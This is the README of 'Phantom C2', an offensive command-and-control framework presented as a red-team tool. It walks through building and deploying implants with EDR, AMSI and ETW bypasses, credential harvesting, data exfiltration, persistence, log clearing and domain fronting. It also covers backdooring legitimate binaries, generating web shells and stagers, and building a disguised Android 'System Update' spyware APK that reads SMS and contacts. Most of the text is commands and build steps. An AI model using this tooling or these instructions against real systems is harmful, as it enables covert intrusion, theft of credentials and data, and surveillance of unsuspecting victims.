___
____/ \____
____/ _ _ \____
____/ _____/ \_/ \_____ \____
____/ _____/ PHANTOM C2 \_____ \____
/______/____________________________\______\
\___ ✦ ___/
\_______•_______/
[::] Phantom C2 Framework — Red Team Operations
[::] Stealth • Precision • Control
A modern Command & Control framework for authorized red team engagements
Inspired by the B-2 Spirit — invisible, precise, and lethal
Features | Installation | Usage | Agent Capabilities | Payloads | Disclaimer
Interface
- Dual interface — choose CLI, Web UI, or both on startup
- Operator authentication — first-run setup + masked password login
- Web UI dashboard — Cobalt Strike/Mythic-inspired with light/dark theme toggle
- CLI shell — styled prompt with session recording and real-time event notifications
- Keyboard shortcuts — Alt+1-9 tab switching,
/to focus terminal
Communications
- HTTP/HTTPS/WS/WSS/DNS/TCP/SMB listeners with malleable communication profiles
- Encrypted comms — RSA-2048 key exchange + AES-256-GCM with auto key rotation
- 4 malleable profiles — Default, Microsoft 365, Cloudflare Workers, Redirector
- SMB/TCP pivoting — agent-to-agent relay for lateral access (TCP works cross-platform; SMB requires Windows)
- Mobile endpoint —
/api/v1/mobile/checkinfor Android/iOS callbacks - Listener presets — save, load, one-click launch from CLI or Web UI
- JA3 fingerprint randomization — random cipher suites per connection to avoid TLS fingerprinting
- User-Agent rotation — 7 real browser UAs randomly selected per request
- Traffic padding — random-length data padding defeats traffic pattern analysis
- Exponential backoff — failed connections use 2^n retry to avoid flooding detection
Evasion & Stealth
- AMSI bypass — patches AmsiScanBuffer
- ETW bypass — patches EtwEventWrite
- ntdll unhooking — loads clean .text from disk
- Process hollowing — CreateProcess suspended + QueueUserAPC
- Sleep encryption — Ekko-style memory encryption during sleep (defeats BeaconEye, YARA)
- Heap encryption during sleep — XOR all busy heap blocks with a random key before sleeping, decrypt on wake; defeats heap scanners that scan for implant config strings
- Early Bird APC injection — inject shellcode into a suspended process before EDR DLL hooks initialise; shellcode executes when thread resumes, before any TLS callbacks
- Indirect syscalls — Halo's Gate SSN resolution to bypass EDR hooks
- Parent PID spoofing — spawn processes under explorer.exe/svchost.exe
- Stack spoofing framework — fake call stack during sleep
- Timestomping — modify file timestamps to match reference files
- Log cleanup — clear Windows event logs (Security, System, PowerShell) and Linux syslogs
- Unhook ALL DLLs — ntdll + kernel32 + kernelbase + advapi32 (not just ntdll)
- Remove PE headers — wipe MZ/PE signatures from memory (invisible to scanners)
- Patch all ETW providers — EtwEventWrite, EtwEventWriteEx, EtwEventWriteFull, EtwEventWriteTransfer, NtTraceEvent
- BlockDLLs policy — spawn processes that block EDR DLL injection (BLOCK_NON_MICROSOFT_BINARIES)
- Module stomping — overwrite legitimate DLL .text with implant code
- Hardware breakpoint hooks — debug register-based hooking (no code modification)
- Advanced evasion init — single command runs all bypass techniques at once
- Self-cleanup — removes binary and clears environment on kill/kill-date
- Sandbox detection — uptime, CPU, hostname, environment checks
- Mobile evasion — anti-emulator, anti-Frida, anti-debug, anti-AV (25+ packages)
Execution
- In-memory BOF — COFF parser (Windows), memfd_create (Linux), 55+ BOF catalog
- .NET assembly execution — in-memory via PowerShell reflection (Seatbelt, Rubeus, SharpHound, Certify, etc.)
- Shellcode execution — VirtualAlloc/mmap, zero disk footprint
- Process injection — CreateRemoteThread or Early Bird APC (
inject earlybird) - 22 AD commands — enumeration, Kerberoasting, DCSync, lateral movement
Initial Access
- Port scanner — TCP port scan with service detection
- Password spray — SMB-based credential spraying
- Network discovery — ping sweep / nmap host discovery
- SMB enumeration — share listing and access checks
- DNS enumeration — A, MX, NS, TXT, SRV, SOA record queries
- Web fingerprinting — header analysis + common path discovery (robots.txt, .git, .env)
- Vulnerability scan — basic vuln assessment (open ports, SMB signing, common vulns)
Post-Exploitation
- Token manipulation — steal, make, revert, impersonate
- Keylogger — GetAsyncKeyState (Windows), xinput (Linux)
- C2-tunneled SOCKS5 proxy — runs on operator's machine, proxychains-compatible
- Port forwarding — forward local ports to remote targets through agents
- Credential harvesting — browser, WiFi, clipboard, SSH, RDP, vault
- 12 persistence methods — registry, schtask, startup folder, WMI event (fileless), Windows service, logon script, COM hijack, cron, systemd, bashrc, profile, rc.local
- Persistence management —
persist listto check installed,persist removeto clean all - Lateral movement — wmiexec, winrm, psexec, ssh, pth, wmi-spawn, winrm-spawn
- 55+ BOF catalog — AD enum, ADCS, credentials, kerberos, evasion, privesc, networking
Data Exfiltration (12 methods)
- DNS exfil — encode data as DNS subdomain queries (stealthy, bypasses firewalls)
- HTTP exfil — POST data to external server (fast)
- ICMP exfil — embed data in ping packets (no TCP/UDP required)
- SMB exfil — copy to network shares
- Credential theft — clipboard, browser passwords, WiFi keys, RDP saved creds, Windows vault
- Key discovery — SSH private keys, AWS/Azure/GCP/Kubernetes credentials, .env files
- Data packaging — compress directories for efficient exfiltration
Payload Generation (26+ types)
- Agent binaries — Windows EXE, Windows DLL (sideload/rundll32/regsvr32), Linux ELF, garble-obfuscated
- Web shells — ASPX, PHP, JSP (token-protected with 404 decoy)
- Stagers — PowerShell, Bash, Python, HTA, VBA macro
- Mobile — Android APK builder (30+ fake app templates), iOS MDM + phishing
- Binary backdooring — inject agent into any PE/ELF binary (like Sliver
backdoor) - DLL sideloading — proxy DLL for Teams, Slack, Chrome, VSCode, Firefox, PuTTY
- LNK shortcut backdoor — malicious shortcuts with real app icons
- Installer wrapper — trojanized setup that runs agent + real installer
- Service DLL — Windows service under svchost (auto-restart, survives reboot)
- WMI event subscription — fileless persistence (no files on disk)
- Office template macro — VBA in Normal.dotm (runs on every new document)
- Registry/scheduled task/startup folder — multiple persistence generators
- Obfuscation options — None, Strip+UPX (60% size reduction), or Garble from Web UI
- Plugin system — extensible plugins directory (.py, .sh, .ps1) with auto-discovery
- Resumable file transfers — 4MB chunked transfers with SHA-256 checksums
- API key authentication — generate keys for scripting/automation (X-API-Key header)
Web UI (Full Feature Parity with CLI)
- 3-color theme — violet + cyan + red only; light/dark toggle with persistence
- Compact agent rows — status dot, OS icon, host/user/IP/last-seen all in one line
- Labeled sidebar icons — all tabs with icons and labels
- Dashboard — real-time stats, beacon graphs, network topology, engagement timer
- Agent management — rename agents, delete dead agents, tag agents, compact row view
- Listener management — create, start/stop, save presets, one-click launch
- Interactive terminal — colored output, command history, quick-action buttons, OS-aware help
- Payload generator — listener/preset dropdown, obfuscation level, auto-download
- Persistence backdoor generator — 10 types with OPSEC risk indicator (🟢/🟡/🔴), OS badge, dynamic Target App field, listener auto-populate
- Binary backdoor — inject agent into any PE/ELF with icon preservation
- .NET Assembly panel — tabbed quick-args (Seatbelt / Rubeus / SharpHound / Other), one-click fill
- Upload to Agent — drag & drop file zone with size display, quick remote path buttons
- Pivot Control — SMB / TCP tab switcher with colour-coded start/stop
- ExC2 Channels — visual channel selector cards (Slack / Teams / Gist), API token field, status badge
- File browser — OS-adaptive (dir/ls), clickable folders, Up/Refresh navigation
- Credential manager — add/view/remove harvested credentials with type tagging
- Loot viewer — browse captured output by type (creds, files, screenshots, keylogs)
- Pivot map — canvas network graph showing agents grouped by subnet
- IOC dashboard — tracks files dropped, network connections, processes, persistence
- Session replay — replay any agent's full command history with timestamps
- Command templates — 6 built-in templates (Initial Enum, AD Enum, etc.) with one-click Run All
- MITRE ATT&CK mapping — 16 technique IDs mapped to Phantom commands
- Auto-tasks — configure commands to run automatically on new agent check-in
- Operator audit log — who sent what command to which agent
- Engagement notes — persistent notepad for documenting findings
- Browser notifications — push alerts on new agent check-in
- Export data — download full engagement data as JSON
- SOCKS proxy — start/stop C2-tunneled SOCKS from the terminal tab
- Sleep/jitter control — adjust beacon intervals from the Web UI
- Multi-operator — concurrent CLI + Web UI sessions
Operations
- C2-tunneled SOCKS5 — proxychains-compatible pivoting through agents
- Engagement timer — elapsed time tracking in topbar
- Engagement reporting — Markdown + CSV with full activity timeline
- Webhook notifications — Slack/Discord alerts on events
- Session recording — every command logged for documentation
- Built-in diagnostics —
--doctorflag checks 25+ system requirements - Redirector — production Caddy Docker redirector with Let's Encrypt TLS, path-based C2 routing, decoy page, and access logging (see
deployments/redirector/) - Docker deployment —
docker-compose up -done-liner
# Step 1: Install Go (if not already installed)
sudo apt update
sudo apt install -y golang-go git make
# Verify Go version (1.22+ required)
go version
# Step 2: Clone the repository
git clone https://github.com/phantom-offensive/Phantom.git
cd Phantom
# Step 3: Install dependencies
go mod tidy
# Step 4: (Optional) Install garble for agent obfuscation
go install mvdan.cc/garble@latest
# Step 5: Generate RSA keypair (required for encrypted comms)
go run ./cmd/keygen -out configs/
# Step 6: (Optional) Generate TLS certificates for HTTPS listeners
bash scripts/generate_certs.sh
# Step 7: Build the server
make server
# Step 8: Start Phantom
./build/phantom-server --config configs/server.yaml# Step 1: Install Go
# Download from https://go.dev/dl/ and run the installer
# Or use winget:
winget install GoLang.Go
# Restart your terminal after installing Go, then verify:
go version
# Step 2: Install Git (if not already installed)
winget install Git.Git
# Step 3: Clone the repository
git clone https://github.com/phantom-offensive/Phantom.git
cd Phantom
# Step 4: Install dependencies
go mod tidy
# Step 5: (Optional) Install garble for agent obfuscation
go install mvdan.cc/garble@latest
# Step 6: Generate RSA keypair
go run ./cmd/keygen -out configs/
# Step 7: Build the server
go build -ldflags "-s -w" -o build\phantom-server.exe ./cmd/server
# Step 8: Start Phantom
.\build\phantom-server.exe --config configs\server.yamlLinux:
git clone https://github.com/phantom-offensive/Phantom.git && cd Phantom && go mod tidy && go run ./cmd/keygen -out configs/ && make server && ./build/phantom-server --config configs/server.yamlWindows (PowerShell):
git clone https://github.com/phantom-offensive/Phantom.git; cd Phantom; go mod tidy; go run ./cmd/keygen -out configs/; go build -ldflags "-s -w" -o build\phantom-server.exe ./cmd/server; .\build\phantom-server.exe --config configs\server.yamlgit clone https://github.com/phantom-offensive/Phantom.git
cd Phantom
docker-compose up -d
docker attach phantom-c2Exposes: HTTP (8080), HTTPS (443), DNS (53), Web UI (3000)
./build/phantom-server --config configs/server.yamlYou will see:
___ __ __ ___ _ __ ______ ____ __ ___
/ _ \/ / / / / _ | / |/ //_ __// __ \ / |/ /
/ ___/ /_/ / / __ |/ / / / / /_/ // /|_/ /
/_/ \____/ /_/ |_/_/|_/ /_/ \____//_/ /_/
[::] Phantom C2 Framework — Red Team Operations
[::] Version: dev
[*] Loading configuration from configs/server.yaml
[*] Initializing server...
[+] Listener 'fallback-http' started on 0.0.0.0:8080 (http)
[+] Phantom C2 server ready
[*] Type 'help' for available commands
phantom >
phantom > help
Phantom C2 — Commands
─────────────────────────────────────────
agents List all connected agents
interact <name|id> Interact with an agent
listeners [start|stop] <name> Manage listeners
tasks [agent] View task history
generate <type> [url] Build agent or generate payload
remove <name|id> Remove a dead agent
loot [agent] View captured loot
events View event log
clear Clear screen
help Show this help
exit Shutdown and exit
phantom > agents
┌──────────┬───────────────┬─────────┬──────────┬───────┬─────────────┬──────────┬──────────┬────────┐
│ ID │ Name │ OS │ Hostname │ User │ IP │ Sleep │ Last Seen│ Status │
├──────────┼───────────────┼─────────┼──────────┼───────┼─────────────┼──────────┼──────────┼────────┤
│ a3f2e8c1 │ silent-falcon │ windows │ DC-PROD │ admin │ 10.0.1.42 │ 10s/20% │ 2s ago │ active │
│ b7d4f091 │ dark-raven │ linux │ web-01 │ root │ 10.0.1.100 │ 10s/20% │ 5s ago │ active │
└──────────┴───────────────┴─────────┴──────────┴───────┴─────────────┴──────────┴──────────┴────────┘
phantom > interact silent-falcon
[+] Interacting with silent-falcon (admin@DC-PROD)
phantom [silent-falcon] > shell whoami
[+] Task queued (ID: a3f2e8c1) — waiting for agent check-in...
[+] Result:
dc-prod\admin
phantom [silent-falcon] > ad-help
(shows all 22 AD commands)
phantom [silent-falcon] > ad-enum-users
phantom [silent-falcon] > ad-kerberoast
phantom [silent-falcon] > screenshot
phantom [silent-falcon] > persist registry
phantom [silent-falcon] > back
| Command | Description |
|---|---|
shell <command> |
Execute shell command (cmd.exe / /bin/sh) |
upload <local> <remote> |
Upload file to agent |
download <remote> |
Download file from agent |
screenshot |
Capture screenshot |
ps |
List running processes |
sysinfo |
Get system information |
sleep <sec> [jitter%] |
Change sleep interval |
cd <path> |
Change working directory |
bof <file> [args] |
Execute Beacon Object File (in-memory) |
shellcode <file> |
Execute raw shellcode in-memory |
inject <pid> <file> |
Inject shellcode into remote process (CreateRemoteThread) |
inject earlybird <file> |
Inject via Early Bird APC (pre-EDR-hook, OPSEC-safe) |
ad-* |
Active Directory commands (type ad-help) |
token <cmd> |
Token manipulation (steal/make/revert/impersonate) |
keylog <seconds> |
Start keylogger |
creds <target> |
Credential harvesting (browser/wifi/clipboard/ssh) |
socks start [port] |
Start C2-tunneled SOCKS5 proxy |
portfwd <local> <remote> |
Port forwarding through agent |
evasion |
Run evasion (AMSI/ETW/ntdll unhook) |
evasion timestomp <f> <r> |
Match file timestamps |
evasion clearlogs |
Clear Windows/Linux event logs |
persist <method> |
Install persistence (see below) |
persist list |
Show installed persistence |
persist remove |
Remove all persistence |
lateral <method> <args> |
Lateral movement (wmiexec/winrm/psexec/ssh/pth) |
pivot <cmd> |
SMB named pipe / TCP pivot relay |
kill |
Terminate the agent |
info |
Show agent details |
tasks |
Show task history |
back |
Return to main menu |
| Method | Platform | Description |
|---|---|---|
registry |
Windows | HKCU Run key (no admin needed) |
schtask |
Windows | Scheduled task on logon |
startup |
Windows | Copy to Startup folder |
wmi |
Windows | WMI event subscription (fileless) |
winservice |
Windows | Windows service as SYSTEM |
logonscript |
Windows | UserInitMprLogonScript (before Explorer) |
comhijack |
Windows | COM object hijack (loads with Explorer) |
cron |
Linux | Cron job every 5 minutes |
service |
Linux | Systemd user service (auto-restart) |
bashrc |
Linux | .bashrc backdoor |
profile |
Linux | .profile backdoor (login shells) |
rc.local |
Linux | /etc/rc.local boot script (root required) |
lateral wmiexec <target> <user> <pass> <command>
lateral winrm <target> <user> <pass> <command>
lateral psexec <target> <user> <pass> <command>
lateral ssh <target> <user> <pass> <command>
lateral pth <target> <user> <ntlm_hash> <command>
lateral wmi-spawn <target> <user> <pass> <stager_url>
lateral winrm-spawn <target> <user> <pass> <stager_url>
| Capability | Windows | Linux | macOS |
|---|---|---|---|
| Shell Execution | cmd.exe | /bin/sh | /bin/sh |
| File Upload/Download | Yes (resumable chunks) | Yes (resumable chunks) | Yes (resumable chunks) |
| Screenshot | PowerShell GDI | import/scrot/xwd | screencapture |
| Process List | tasklist | ps aux | ps aux |
| System Info | Full | Full | Full |
| Persistence | 7 methods (registry, schtask, startup, WMI, service, logon, COM) | 5 methods (cron, systemd, bashrc, profile, rc.local) | 2 methods (LaunchAgent plist, cron) |
| BOF Execution | In-memory COFF loader (55+ catalog) | memfd_create | N/A |
| .NET Assembly | In-memory via reflection | N/A | N/A |
| Shellcode Execution | VirtualAlloc + CreateThread | mmap RWX | mmap RWX |
| Process Injection | CreateRemoteThread / Early Bird APC | N/A | N/A |
| Sandbox Detection | Yes | Yes | Yes (Frida, lldb, Instruments.app) |
| Lateral Movement | wmiexec, winrm, psexec, pth | ssh | ssh |
| Credential Harvest | browser, WiFi, clipboard, SSH, RDP, vault | ssh-keys, cloud-keys | Keychain, WiFi, browser, SSH, AWS, history |
| Exfiltration | DNS, HTTP, ICMP, SMB, clipboard, browser, WiFi, vault | DNS, HTTP, ICMP, ssh-keys, cloud-keys | DNS, HTTP, ICMP, keychain, ssh-keys, cloud-keys |
| Initial Access | portscan, spray, enum-smb, enum-web, vuln-scan | portscan, enum-dns, netdiscover | portscan, enum-dns, netdiscover |
Enumeration: ad-enum-domain, ad-enum-users, ad-enum-groups, ad-enum-computers, ad-enum-shares, ad-enum-spns, ad-enum-gpo, ad-enum-trusts, ad-enum-admins, ad-enum-asrep, ad-enum-delegation, ad-enum-laps
Attacks: ad-kerberoast, ad-asreproast, ad-dcsync
Credential Access: ad-dump-sam, ad-dump-lsa, ad-dump-tickets
Lateral Movement: ad-psexec, ad-wmi, ad-winrm, ad-pass-the-hash
ADCS (Certificate Abuse): ad-adcs-enum, ad-adcs-request
ad-adcs-enum Enumerate certificate templates, flag ESC1-ESC8 misconfigs
ad-adcs-request <template> <upn> Request cert with SAN override (ESC1 priv-esc)
Example: ad-adcs-request UserAuthentication administrator@corp.local
Output: phantom_cert.pfx (password: phantom123)
Use with: Rubeus.exe asktgt /user:administrator /certificate:phantom_cert.pfx /password:phantom123
exfil dns <file> <domain> DNS subdomain tunneling (stealthy)
exfil http <file> <url> HTTP POST exfil (fast)
exfil icmp <file> <target> ICMP ping data embed (no TCP/UDP)
exfil smb <file> <share> SMB file copy
exfil clipboard Steal clipboard
exfil browser Chrome/Firefox credential databases
exfil wifi Saved WiFi passwords
exfil rdp Saved RDP credentials
exfil vault Windows Credential Vault
exfil ssh-keys Find SSH private keys
exfil cloud-keys AWS/Azure/GCP/K8s credentials
exfil compress <dir> <output> Compress directory for exfil
assembly Seatbelt.exe -group=all
assembly Rubeus.exe kerberoast
assembly SharpHound.exe -c All -d domain.local
assembly Certify.exe find /vulnerable
assembly inline <base64_data> [args]
assembly list
pivot start [pipe-name] Start SMB named pipe relay (Windows only, default: msupdate)
pivot stop Stop SMB named pipe relay
pivot list Show active SMB relay
pivot tcp-start [addr] Start TCP pivot relay — cross-platform (default: 0.0.0.0:4444)
pivot tcp-stop Stop TCP pivot relay
pivot tcp-list Show active TCP relay
# TCP pivot example: edge agent exposes port 5555, internal agents connect to it
pivot tcp-start 0.0.0.0:5555
# Internal agent (no internet): connects to edge:5555, sends data queued for C2 check-in
initaccess portscan <target> <ports> TCP port scanner
initaccess spray <target> <users> <pass> Password spray
initaccess enum-smb <target> SMB share enumeration
initaccess enum-dns <domain> <ns> DNS record enumeration
initaccess enum-web <url> Web fingerprinting
initaccess vuln-scan <target> Vulnerability assessment
initaccess netdiscover <cidr> Host discovery
phantom > generate exe https://your-c2.com:443
[*] Building windows/amd64 agent...
[+] Agent built successfully!
Output: build/agents/phantom-agent_windows_amd64.exe
Size: 6.4 MB
Platform: windows/amd64
Listener: https://your-c2.com:443
Sleep: 10s / 20%
phantom > generate dll https://your-c2.com:443
[*] Building windows/amd64 DLL agent...
[*] Build mode: c-shared — sideloadable Windows DLL
[*] Exports: Start (rundll32), DllInstall (regsvr32 /i), DllRegisterServer (regsvr32)
[+] Agent built successfully!
Output: build/agents/phantom-agent_windows_amd64.dll
Size: 6.6 MB
Execution methods:
rundll32.exe phantom-agent_windows_amd64.dll,Start
regsvr32 /s /i phantom-agent_windows_amd64.dll
regsvr32 /s phantom-agent_windows_amd64.dll
# Windows agent
make agent-windows LISTENER_URL=https://your-c2.com:443 SLEEP=10 JITTER=20
# Linux agent
make agent-linux LISTENER_URL=https://your-c2.com:443 SLEEP=10 JITTER=20
# macOS agent (darwin/amd64)
make agent-darwin LISTENER_URL=https://your-c2.com:443 SLEEP=10 JITTER=20
# Obfuscated (garble)
make agent-garble-windows LISTENER_URL=https://your-c2.com:443 SLEEP=10 JITTER=20
# Domain fronting — SNI goes to Cloudflare CDN, Host header routes to your Worker
make agent-windows LISTENER_URL=https://cdn.cloudflare.com:443 \
FRONT_DOMAIN=cdn.cloudflare.com HOST_HEADER=your-c2-worker.workers.devmake help # Show all available targets
make server # Build the server binary
make run # Build + start the server
make restart # Kill running server, rebuild, and start fresh
make agent-windows # Cross-compile Windows/amd64 agent
make agent-linux # Cross-compile Linux/amd64 agent
make agent-darwin # Cross-compile macOS/amd64 agent
make agent-garble-windows # Obfuscated Windows agent via garble
make agent-dll # Cross-compile Windows DLL agent (rundll32/regsvr32/sideload)
make agent-shellcode # Generate PIC shellcode (.bin) from Windows agent via Donut
make agent-all # Build all agent variants (Windows + Linux + macOS + DLL + shellcode if donut installed)
make keygen # Generate RSA keypair for server
make certs # Generate self-signed TLS certificates
make deps # Install dependencies (Go modules + garble)
make test # Run all tests
make clean # Remove all build artifactsCommon workflow after code changes:
# Restart the server with latest changes
make restart
# If you changed implant/agent code, rebuild the agent too
make agent-windows LISTENER_URL=http://YOUR-IP:8080For agents to communicate with the C2, the server's RSA public key must be embedded:
cd ~/phantom
SERVER_PUB_DER_B64=$(python3 -c "
import base64, re
with open('configs/server.pub','rb') as f: pem = f.read()
b64 = re.sub(r'-----[^-]+-----', '', pem.decode()).replace('\n','').strip()
print(base64.b64encode(base64.b64decode(b64)).decode())")
GOOS=linux GOARCH=amd64 CGO_ENABLED=0 go build -ldflags "-s -w \
-X 'github.com/phantom-c2/phantom/internal/implant.ListenerURL=http://YOUR-IP:8080' \
-X 'github.com/phantom-c2/phantom/internal/implant.SleepSeconds=5' \
-X 'github.com/phantom-c2/phantom/internal/implant.JitterPercent=10' \
-X 'github.com/phantom-c2/phantom/internal/implant.ServerPubKey=$SERVER_PUB_DER_B64'" \
-o build/agents/phantom-agent_linux_amd64 ./cmd/agentThe darwin agent (cmd/agent-darwin) targets macOS and includes:
| Capability | Details |
|---|---|
| Persistence | LaunchAgent plist (~/Library/LaunchAgents/com.apple.systemupdated.plist) runs on login with KeepAlive, no admin needed. Cron fallback also supported. |
| Credential Harvest | Keychain (internet + generic passwords), WiFi passwords via security, Chrome Login Data (sqlite3), SSH private keys, AWS credentials, shell history grep |
| Sandbox Detection | Checks for Frida, Instruments.app, lldb; DYLD_INSERT_LIBRARIES injection env vars; low CPU count; known sandbox hostnames |
| Log Clearing | Wipes ~/Library/Logs, ASL logs, shell history (bash + zsh), system unified log |
| Shell execution | /bin/sh (same as Linux path in shell.go) |
Persistence commands (on a macOS agent):
persist launchagent # Install LaunchAgent plist (login persistence, no admin)
persist cron # Cron @reboot fallback
persist list # List active persistence
persist remove # Remove all installed persistence
macOS-specific creds commands:
creds keychain # Dump Keychain internet + generic passwords
creds wifi # WiFi passwords via security command
creds all # Full macOS harvest (keychain, wifi, ssh, browser, aws, history)
Agents automatically detect and route through the system proxy — no configuration needed.
- Windows — reads proxy via
HTTP_PROXY/HTTPS_PROXYenv vars and falls back to Windows registry (IE/WinHTTP proxy settings), so agents work through Zscaler and BlueCoat transparent proxies without modification - Linux/macOS — reads
HTTP_PROXY,HTTPS_PROXY,NO_PROXYenvironment variables
If the proxy is set at the OS level (e.g., by a GPO or MDM), the agent picks it up automatically. No extra build flags needed.
Route agent traffic through a trusted CDN to bypass network-layer inspection. The TLS SNI goes to a CDN host defenders trust (e.g., cdn.cloudflare.com) while the HTTP Host header routes to your actual C2 origin.
# Build a domain-fronted agent pointing at a Cloudflare Worker
make agent-windows \
LISTENER_URL=https://cdn.cloudflare.com:443 \
FRONT_DOMAIN=cdn.cloudflare.com \
HOST_HEADER=your-c2-worker.workers.dev
# Same for Linux
make agent-linux \
LISTENER_URL=https://cdn.cloudflare.com:443 \
FRONT_DOMAIN=cdn.cloudflare.com \
HOST_HEADER=your-c2-worker.workers.devHow it works:
- Agent connects to
cdn.cloudflare.com:443— TLS SNI =cdn.cloudflare.com(CDN's real cert is verified) - HTTP
Host: your-c2-worker.workers.dev— Cloudflare routes the request to your Worker - Network inspection tools see a connection to a trusted Cloudflare IP — not your C2
The profile YAML also supports front_domain and host_header fields for server-side documentation — see configs/profiles/cloudflare.yaml for an annotated example.
Route agent callbacks through a legitimate domain with a trusted TLS certificate. Agents call your domain on 443 — Caddy forwards only C2 paths to your listener, everything else returns a convincing decoy page.
Agent → https://www.yourdomain.com:443 → Caddy → C2 listener (127.0.0.1:8080)
cd deployments/redirector
# Set your domain (never commit this file)
echo "C2_DOMAIN=yourdomain.com" > .env
# Start (Caddy auto-obtains Let's Encrypt cert)
docker compose up -d
# Watch live agent traffic
docker logs phantom-redirector -f 2>&1 | grep '"request"' | jq '{ip: .request.remote_ip, uri: .request.uri, status: .status}'Requirements:
- Domain A record pointing at your server's public IP
- Ports 80 + 443 open inbound (80 for Let's Encrypt HTTP-01 challenge)
- Docker + docker compose
C2 paths proxied: /api/v1/*, /cdn-cgi/*, /common/oauth2/*, /app/*
Auto-restart: Caddy uses restart: unless-stopped — survives reboots automatically.
Phantom C2 server auto-start (systemd):
sudo tee /etc/systemd/system/phantom-server.service > /dev/null << 'EOF'
[Unit]
Description=Phantom C2 Server
After=network.target
[Service]
Type=simple
User=YOUR_USER
WorkingDirectory=/path/to/phantom
ExecStart=/path/to/phantom/build/phantom-server --config configs/server.yaml --headless --mode web
Restart=on-failure
RestartSec=5
[Install]
WantedBy=multi-user.target
EOF
sudo systemctl daemon-reload && sudo systemctl enable --now phantom-serverRoute traffic through compromised agents into internal networks using proxychains:
# From Phantom CLI
phantom > interact <agent>
phantom [agent] > socks start 1080
# Or from the Web UI: Terminal tab → "SOCKS Proxy" button
# Configure proxychains
echo 'socks5 127.0.0.1 1080' >> /etc/proxychains4.conf
# Scan internal networks through the agent
proxychains nmap -sT -Pn 10.10.20.0/24
# SSH to internal hosts
proxychains ssh admin@10.10.20.10
# Access internal web apps
proxychains curl http://10.10.20.30:8080Generate tiny loaders (~30KB) that download and execute the agent entirely in-memory — nothing touches disk:
# From API:
curl -X POST http://localhost:3000/api/payload/loader \
-H "Content-Type: application/json" \
-d '{"listener_url":"http://YOUR-IP:8080","loader_type":"syscall"}'| Loader Type | Size | Description |
|---|---|---|
syscall |
~30KB | Direct API loader with anti-sandbox (most stealthy) |
dll |
~25KB | DLL sideload — rename to version.dll, place with Teams/Slack/Chrome |
hollowing |
~35KB | Process hollowing — injects into suspended svchost.exe |
fiber |
~28KB | Windows Fiber execution — avoids thread-based detection |
How it works: C2 encrypts agent with AES-256 → tiny loader downloads encrypted blob → decrypts in-memory → executes. Agent never touches disk, EDR can't scan it.
Inject the Phantom agent into any legitimate executable:
# From CLI
phantom > backdoor /path/to/putty.exe http://YOUR-C2:8080
# From Web UI: Payloads tab → Binary Backdoor panel
# From API
curl -X POST http://localhost:3000/api/payload/backdoor/binary \
-H "Content-Type: application/json" \
-d '{"input":"/path/to/app.exe","listener_url":"http://YOUR-C2:8080"}'Supported backdoor types: DLL sideloading, LNK shortcuts, installer wrappers, service DLLs, registry persistence, scheduled tasks, WMI events (fileless), Office templates, startup folder, Linux bashrc.
Phantom supports a plugin interface for third-party transport modules. ExC2 channels allow agents to receive tasks via services like Slack, Microsoft Teams, GitHub Gists, and DNS-over-HTTPS — transports that often bypass corporate egress controls blocking direct HTTP/HTTPS.
phantom > exchannel list # List registered channels + status
phantom > exchannel start slack # Start polling a channel
phantom > exchannel stop slack # Stop a channel
GET /api/exchannel/list — list all channels with running status
POST /api/exchannel/start — body: {"name":"slack"}
POST /api/exchannel/stop — body: {"name":"slack"}
import "github.com/phantom-c2/phantom/internal/exchannel"
ch := exchannel.NewSlackChannel(
"xoxb-your-bot-token", // Slack bot token
"C0123456789", // Slack channel ID
"https://hooks.slack.com/...", // Incoming webhook (optional)
)
srv.RegisterExChannel(ch)Message format used by agents: [PHANTOM:<agentID>:<base64-payload>]
Setup: Create a Slack app at api.slack.com/apps with chat:write and channels:history bot scopes, install to workspace, and invite the bot to a private channel.
Any struct implementing exchannel.Channel can be registered:
type Channel interface {
Name() string
Start(ctx context.Context) error
Stop() error
Send(agentID string, payload []byte) error
Recv(ctx context.Context) (agentID string, payload []byte, err error)
IsRunning() bool
}Convert the Windows agent EXE to position-independent shellcode (PIC) for process injection without touching disk.
go install github.com/wabzsy/gonut/cmd/donut@latest
# or: pip3 install donut-shellcodemake agent-shellcode LISTENER_URL=https://your-c2.com:443
# Output: build/agents/phantom-agent_windows_amd64.bin
# Flags: -a 2 (x64) -b 1 (bypass AMSI/ETW) -e 3 (entropy) -z 2 (aPLib compress)POST /api/payload/shellcode — body: {"arch": "x64"}. Requires the Windows EXE to be built first.
result, err := payloads.GenerateShellcodeFromAgent("build")
// result.Path → "build/agents/phantom-agent_windows_amd64.bin"Compatible with PhantomImplant loaders (VirtualAlloc+CreateThread, process hollowing, Early Bird APC).
phantom > generate aspx https://your-c2.com:443
[+] Payload generated: build/payloads/update.aspx
[*] Upload to target web server, then access with:
curl -X POST -H 'X-Debug-Token: <token>' -d 'data=whoami' <url>
phantom > generate php https://your-c2.com:443
phantom > generate jsp https://your-c2.com:443
phantom > generate powershell https://your-c2.com:443
phantom > generate bash https://your-c2.com:443
phantom > generate python https://your-c2.com:443
phantom > generate hta https://your-c2.com:443
phantom > generate vba https://your-c2.com:443
| Payload | Platform | Description |
|---|---|---|
aspx |
IIS/ASP.NET | Token-protected web shell with 404 decoy |
php |
Apache/Nginx | Multi-fallback execution (5 methods) |
jsp |
Tomcat/Java | Cross-platform web shell |
powershell |
Windows | Download & execute stager |
bash |
Linux | curl/wget stager |
python |
Cross-platform | SSL-capable stager |
hta |
Windows | Phishing payload (base64 PS cradle) |
vba |
Windows | Office macro (AutoOpen) |
The fastest path to a working Android C2 agent. Uses raw SDK tools (aapt, d8, apksigner) — no Gradle project, no Android Studio build chain. Requires only the Android SDK and a JDK.
# Step 1: Edit the C2 callback URL in the build script
# Open payloads/android/build_apk.sh and set:
# C2_URL="http://YOUR-C2-IP:8080"
# Step 2: Build the APK (on any host with Android SDK installed)
bash payloads/android/build_apk.sh
# Step 3: Install on target device
adb install /tmp/phantom.apk
# Step 4: Launch (app hides immediately — foreground service starts)
adb shell am start -n com.android.systemupdate/.MainActivity
# Step 5: Verify in Phantom Web UI or CLI
# The agent registers via /api/v1/mobile/register
# and checks in every 10s via /api/v1/mobile/checkin
# Step 6: Send commands from the Web UI (http://localhost:3000)
# Or from the command line:
python3 phantom_cli.py <agent-name> shell "whoami"
python3 phantom_cli.py <agent-name> shell "id"
python3 phantom_cli.py <agent-name> shell "ls /sdcard/"
python3 phantom_cli.py <agent-name> shell "content query --uri content://sms"
python3 phantom_cli.py <agent-name> shell "content query --uri content://contacts/phones"What the APK does:
- Disguised as "System Update" with invisible launcher (Theme.NoDisplay)
- Foreground service with notification — survives Android 8+ background execution limits
- Boot persistence via BroadcastReceiver
